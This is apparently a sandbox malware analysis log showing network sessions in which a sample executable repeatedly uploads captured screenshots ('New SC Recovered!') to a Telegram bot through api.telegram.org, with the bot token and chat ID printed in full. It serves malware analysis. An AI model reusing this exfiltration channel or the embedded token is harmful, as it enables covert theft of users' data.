                                                2024-07-25 22:02:07 UTC262OUTPOST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dce963108a87c4
                                                Host: api.telegram.org
                                                Content-Length: 57558
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-07-25 22:02:08 UTC25INHTTP/1.1 100 Continue
                                                2024-07-25 22:02:08 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 39 36 33 31 30 38 61 38 37 63 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 39 36 33 31 30 38 61 38 37 63 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 30 2f 31 30 2f 32 30 32 34 20 31 39 3a 31 38 3a 30 36 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dce963108a87c4Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dce963108a87c4Content-Disposition: form-data; name="caption"New SC Recovered!Time: 10/10/2024 19:18:06User
                                                2024-07-25 22:02:08 UTC16355OUTData Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c
                                                Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
                                                2024-07-25 22:02:08 UTC16355OUTData Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b
                                                Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
                                                2024-07-25 22:02:08 UTC16355OUTData Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14
                                                Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
                                                2024-07-25 22:02:08 UTC7419OUTData Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28
                                                Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
                                                2024-07-25 22:02:08 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 39 36 33 31 30 38 61 38 37 63 34 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dce963108a87c4--


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                15192.168.2.649743149.154.167.2204435020C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 22:02:08 UTC262OUTPOST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcec75a72c3e04
                                                Host: api.telegram.org
                                                Content-Length: 57558
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-07-25 22:02:09 UTC25INHTTP/1.1 100 Continue
                                                2024-07-25 22:02:09 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 63 37 35 61 37 32 63 33 65 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 63 37 35 61 37 32 63 33 65 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 30 2f 31 34 2f 32 30 32 34 20 31 37 3a 31 38 3a 34 31 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcec75a72c3e04Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcec75a72c3e04Content-Disposition: form-data; name="caption"New SC Recovered!Time: 10/14/2024 17:18:41User
                                                2024-07-25 22:02:09 UTC16355OUTData Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c
                                                Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
                                                2024-07-25 22:02:09 UTC16355OUTData Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b
                                                Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
                                                2024-07-25 22:02:09 UTC16355OUTData Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14
                                                Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
                                                2024-07-25 22:02:09 UTC7419OUTData Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28
                                                Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
                                                2024-07-25 22:02:09 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 63 37 35 61 37 32 63 33 65 30 34 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcec75a72c3e04--
                                                2024-07-25 22:02:09 UTC405INHTTP/1.1 401 Unauthorized
                                                Server: nginx/1.18.0
                                                Date: Thu, 25 Jul 2024 22:02:09 GMT
                                                Content-Type: application/json
                                                Content-Length: 58
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                16192.168.2.649744149.154.167.2204435020C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 22:02:11 UTC238OUTPOST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcef2136d34414
                                                Host: api.telegram.org
                                                Content-Length: 57558
                                                Expect: 100-continue
                                                2024-07-25 22:02:12 UTC25INHTTP/1.1 100 Continue
                                                2024-07-25 22:02:12 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 66 32 31 33 36 64 33 34 34 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 66 32 31 33 36 64 33 34 34 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 30 2f 31 38 2f 32 30 32 34 20 30 32 3a 35 31 3a 35 30 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcef2136d34414Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcef2136d34414Content-Disposition: form-data; name="caption"New SC Recovered!Time: 10/18/2024 02:51:50User
                                                2024-07-25 22:02:12 UTC16355OUTData Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c
                                                Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
                                                2024-07-25 22:02:12 UTC16355OUTData Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b
                                                Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
                                                2024-07-25 22:02:12 UTC16355OUTData Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14
                                                Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
                                                2024-07-25 22:02:12 UTC7419OUTData Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28
                                                Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
                                                2024-07-25 22:02:12 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 66 32 31 33 36 64 33 34 34 31 34 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcef2136d34414--
                                                2024-07-25 22:02:12 UTC405INHTTP/1.1 401 Unauthorized
                                                Server: nginx/1.18.0
                                                Date: Thu, 25 Jul 2024 22:02:12 GMT
                                                Content-Type: application/json
                                                Content-Length: 58
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                17192.168.2.649745149.154.167.2204435020C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 22:02:15 UTC262OUTPOST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcf244c2bc1a24
                                                Host: api.telegram.org
                                                Content-Length: 61460
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-07-25 22:02:16 UTC25INHTTP/1.1 100 Continue
                                                2024-07-25 22:02:16 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 32 34 34 63 32 62 63 31 61 32 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 32 34 34 63 32 62 63 31 61 32 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 30 2f 32 32 2f 32 30 32 34 20 30 32 3a 34 33 3a 34 32 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcf244c2bc1a24Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcf244c2bc1a24Content-Disposition: form-data; name="caption"New SC Recovered!Time: 10/22/2024 02:43:42User
                                                2024-07-25 22:02:16 UTC16355OUTData Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c
                                                Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
